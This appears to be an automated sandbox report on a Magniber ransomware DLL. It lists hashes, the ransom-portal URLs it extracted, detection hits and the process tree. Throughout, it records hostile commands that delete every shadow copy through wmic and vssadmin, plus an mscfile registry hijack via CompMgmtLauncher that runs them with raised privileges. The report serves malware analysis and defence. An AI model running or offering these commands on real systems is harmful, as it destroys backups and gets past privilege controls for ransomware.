Analysis
- max time kernel: 123s
- max time network: 126s
- platform: windows7_x64
- resource: win7-20231215-en
- resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
- submitted: 25-12-2023 02:42
Static task: static1
Behavioral task: behavioral1
- Sample: 009aaaf3b4f3a34b662cb9d27fb4409d.dll
- Resource: win7-20231215-en
Behavioral task: behavioral2
- Sample: 009aaaf3b4f3a34b662cb9d27fb4409d.dll
- Resource: win10v2004-20231215-en
General
- Target: 009aaaf3b4f3a34b662cb9d27fb4409d.dll
- Size: 39KB
- MD5: 009aaaf3b4f3a34b662cb9d27fb4409d
- SHA1: ac5bfd05ec67090c4f7180519628328e29f3f39a
- SHA256: 2b474cca6c5ff5e1d435d91694b4436876901e3be9c63c3a1d76ff3dbc432017
- SHA512: 50973c3ac2849c8664d74d7efc07fcb0a43260d05030fa7772f135cf716357d522309e70d7ba4ee51cd44ea7a3c711b321221b33ab192ccce6ee71dceb527aea
- SSDEEP: 768:QJvL0rvzhHm06R0Zd+01mV0kgMazfo269xnWf77/KrkVPe4kQKNNJ7kIGsp9C88K:q0rvzhV6Ra+01Y0dMio39xWDrKrkVm4i
Malware Config
Extracted
- Path: C:\Users\Admin\Pictures\readme.txt
- Family: magniber
- URLs:
  http://5e3cb4a0fe301ec0b2sgokwyejx.yeipgu36oui5z4yvck5w6d252oo3h7ktcsxvs3m2wac6ezmti2iotzad.onion/sgokwyejx
  http://5e3cb4a0fe301ec0b2sgokwyejx.actmake.site/sgokwyejx
  http://5e3cb4a0fe301ec0b2sgokwyejx.bearsat.space/sgokwyejx
  http://5e3cb4a0fe301ec0b2sgokwyejx.mixedon.xyz/sgokwyejx
  http://5e3cb4a0fe301ec0b2sgokwyejx.spiteor.space/sgokwyejx
Signatures
Detect magniber ransomware 2 IoCs
resource  yara_rule
behavioral1/memory/2536-0-0x0000000001D70000-0x00000000020AA000-memory.dmp  family_magniber
behavioral1/memory/1200-109-0x0000000001C80000-0x0000000001C84000-memory.dmp  family_magniber
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
Process spawned unexpected child process 12 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description  pid  pid_target  Process  procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2684  1628  cmd.exe  39
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2784  1628  vssadmin.exe  39
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2036  1628  vssadmin.exe  39
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  1652  1628  cmd.exe  39
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  1820  1628  vssadmin.exe  39
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  204  1628  vssadmin.exe  39
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  1440  1628  vssadmin.exe  39
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  1564  1628  cmd.exe  39
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  396  1628  vssadmin.exe  39
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  816  1628  vssadmin.exe  39
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2964  1628  cmd.exe  39
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  1152  1628  vssadmin.exe  39
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Renames multiple (79) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
Suspicious use of SetThreadContext 3 IoCs
description  pid  Process  procid_target
PID 2536 set thread context of 1200  2536  rundll32.exe  12
PID 2536 set thread context of 1272  2536  rundll32.exe  16
PID 2536 set thread context of 1340  2536  rundll32.exe  15
Interacts with shadow copies 2 TTPs 8 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid  Process
1820  vssadmin.exe
204  vssadmin.exe
1440  vssadmin.exe
396  vssadmin.exe
816  vssadmin.exe
1152  vssadmin.exe
2784  vssadmin.exe
2036  vssadmin.exe
Modifies Internet Explorer settings
description  ioc  Process
(Keys created and values set by iexplore.exe / IEXPLORE.EXE under \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer while the ransom page was opened; the per-key table is not reproduced here.)
Modifies registry class 11 IoCs
description  ioc  Process
Key created  \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open\command  rundll32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""  rundll32.exe
Key created  \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open\command  Explorer.EXE
Key created  \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open\command  taskhost.exe
Key created  \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile  taskhost.exe
Key created  \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell  taskhost.exe
Key created  \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open  taskhost.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""  taskhost.exe
Key created  \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open\command  Dwm.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""  Dwm.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""  Explorer.EXE
Opens file in notepad (likely ransom note) 1 IoCs
pid  Process
1948  notepad.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid  Process
2536  rundll32.exe
2536  rundll32.exe
Suspicious behavior: MapViewOfSection 3 IoCs
pid  Process
2536  rundll32.exe
2536  rundll32.exe
2536  rundll32.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 1 IoCs
pid  Process
868  iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs
pid  Process
868  iexplore.exe
868  iexplore.exe
2596  IEXPLORE.EXE
2596  IEXPLORE.EXE
2596  IEXPLORE.EXE
2596  IEXPLORE.EXE
Suspicious use of UnmapMainImage 1 IoCs
pid  Process
1340  Explorer.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
Process tree (nesting depth in brackets; each entry is path | command line | PID, with the triggered signatures listed beneath it):

[1] C:\Windows\system32\taskhost.exe | "taskhost.exe" | PID:1200
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\notepad.exe | notepad.exe C:\Users\Public\readme.txt | PID:1948
        - Opens file in notepad (likely ransom note)
    [2] C:\Windows\system32\cmd.exe | cmd /c "start http://5e3cb4a0fe301ec0b2sgokwyejx.actmake.site/sgokwyejx^&2^&35892517^&79^&381^&12" | PID:1740
        - Suspicious use of WriteProcessMemory
        [3] C:\Program Files\Internet Explorer\iexplore.exe | "C:\Program Files\Internet Explorer\iexplore.exe" http://5e3cb4a0fe301ec0b2sgokwyejx.actmake.site/sgokwyejx&2&35892517&79&381&12 | PID:868
            - Modifies Internet Explorer settings
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SetWindowsHookEx
            - Suspicious use of WriteProcessMemory
            [4] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:868 CREDAT:275457 /prefetch:2 | PID:2596
                - Modifies Internet Explorer settings
                - Suspicious use of SetWindowsHookEx
    [2] C:\Windows\system32\wbem\wmic.exe | C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet" | PID:1968
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\system32\cmd.exe | cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"" | PID:1420
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\wbem\WMIC.exe | C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe" | PID:1824
            - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | PID:1340
    - Modifies registry class
    - Suspicious use of UnmapMainImage
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\rundll32.exe | rundll32.exe C:\Users\Admin\AppData\Local\Temp\009aaaf3b4f3a34b662cb9d27fb4409d.dll,#1 | PID:2536
        - Suspicious use of SetThreadContext
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\wbem\wmic.exe | C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet" | PID:2376
        [3] C:\Windows\system32\cmd.exe | cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"" | PID:2308
            [4] C:\Windows\system32\wbem\WMIC.exe | C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe" | PID:1916
    [2] C:\Windows\system32\wbem\wmic.exe | C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet" | PID:772
    [2] C:\Windows\system32\cmd.exe | cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"" | PID:856
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\wbem\WMIC.exe | C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe" | PID:1752

[1] C:\Windows\system32\Dwm.exe | "C:\Windows\system32\Dwm.exe" | PID:1272
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\wbem\wmic.exe | C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet" | PID:2640
    [2] C:\Windows\system32\cmd.exe | cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"" | PID:2652
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\wbem\WMIC.exe | C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe" | PID:2904

[1] C:\Windows\system32\cmd.exe | cmd /c CompMgmtLauncher.exe | PID:2684
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\CompMgmtLauncher.exe | CompMgmtLauncher.exe | PID:2988
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\wbem\wmic.exe | "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet" | PID:2688

[1] C:\Windows\system32\vssadmin.exe | vssadmin.exe Delete Shadows /all /quiet | PID:2784
    - Process spawned unexpected child process
    - Interacts with shadow copies

[1] C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | PID:2900

[1] C:\Windows\system32\vssadmin.exe | vssadmin.exe Delete Shadows /all /quiet | PID:2036
    - Process spawned unexpected child process
    - Interacts with shadow copies

[1] C:\Windows\system32\cmd.exe | cmd /c CompMgmtLauncher.exe | PID:1652
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\CompMgmtLauncher.exe | CompMgmtLauncher.exe | PID:1616
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\wbem\wmic.exe | "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet" | PID:1088

[1] C:\Windows\system32\vssadmin.exe | vssadmin.exe Delete Shadows /all /quiet | PID:1820
    - Process spawned unexpected child process
    - Interacts with shadow copies

[1] C:\Windows\system32\vssadmin.exe | vssadmin.exe Delete Shadows /all /quiet | PID:204
    - Process spawned unexpected child process
    - Interacts with shadow copies

[1] C:\Windows\system32\vssadmin.exe | vssadmin.exe Delete Shadows /all /quiet | PID:1440
    - Process spawned unexpected child process
    - Interacts with shadow copies

[1] C:\Windows\system32\cmd.exe | cmd /c CompMgmtLauncher.exe | PID:1564
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\CompMgmtLauncher.exe | CompMgmtLauncher.exe | PID:2264
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\wbem\wmic.exe | "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet" | PID:2420

[1] C:\Windows\system32\vssadmin.exe | vssadmin.exe Delete Shadows /all /quiet | PID:396
    - Process spawned unexpected child process
    - Interacts with shadow copies

[1] C:\Windows\system32\vssadmin.exe | vssadmin.exe Delete Shadows /all /quiet | PID:816
    - Process spawned unexpected child process
    - Interacts with shadow copies

[1] C:\Windows\system32\cmd.exe | cmd /c CompMgmtLauncher.exe | PID:2964
    - Process spawned unexpected child process
    [2] C:\Windows\system32\CompMgmtLauncher.exe | CompMgmtLauncher.exe | PID:1244
        [3] C:\Windows\system32\wbem\wmic.exe | "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet" | PID:1648

[1] C:\Windows\system32\vssadmin.exe | vssadmin.exe Delete Shadows /all /quiet | PID:1152
    - Process spawned unexpected child process
    - Interacts with shadow copies
Network
MITRE ATT&CK Enterprise v15
Downloads